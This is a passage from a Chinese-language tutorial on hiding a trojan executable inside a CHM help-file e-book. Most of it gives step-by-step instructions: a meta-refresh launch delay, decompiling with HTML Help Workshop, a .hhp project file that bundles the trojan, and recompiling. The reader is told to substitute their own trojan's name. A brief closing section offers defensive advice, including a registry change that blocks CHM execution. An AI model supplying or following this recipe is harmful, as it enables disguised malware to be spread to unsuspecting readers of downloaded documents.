代码注释:
content="3是转向时间(单位为秒),可以按照木马程序的运行时间自行更改,建议不要超过5秒。其中的default.htm可以改为你用的电子书的默认主页名,灰色按钮克星.exe为木马程序名,你可以按照情况修改。
Step4:运行HTML Help Workshop,选择文件菜单下的反编译项。接下来在反编译后的目录中可以见到windows.hhc(对应帮助文档两侧的"目录"项)和windows.hhk(对应帮助文档两侧的"索引"项)。
Step5:现在要做的就是把木马程序复制到反编译后的目录中(本文中以插入灰色按钮克星.exe这款小软件为例),并在此目录下构建一个诸如文件名为cytkk.hhp的文件(用记事本即可),代码如下:
[OPTIONS]
Compatibility=1.1 or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm
灰色按钮克星.exe
代码注释:
windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=后面改为在第一步时你得到的标题栏文字,windows.hhc及windows.hhk分别改为第三步得到的文件名。
最后用HTML Help Workshop打开cytkk.hhp,点击"文件"→"编译",待提示完成后,就可以在目标目录中发觉早已编译好的带有木马的电子书windows.chm了。
高手传经:防之有道
我们不可能对下载的每本书都进行反编译工作来加以检测,那是会累死人的。笔者建议你们在下载电子书籍时,尽量去著名网站下载。
另外读者同学们也可以更改本地安全属性,使CHM木马未能在本地运行木马程序,将注册表"HKEY_CURRENT_U SER/Software/Microsoft/Windows/Current Version/Internet Settings/Zones/0"下的1004项的值由原先十进制的0改为十六进制的3
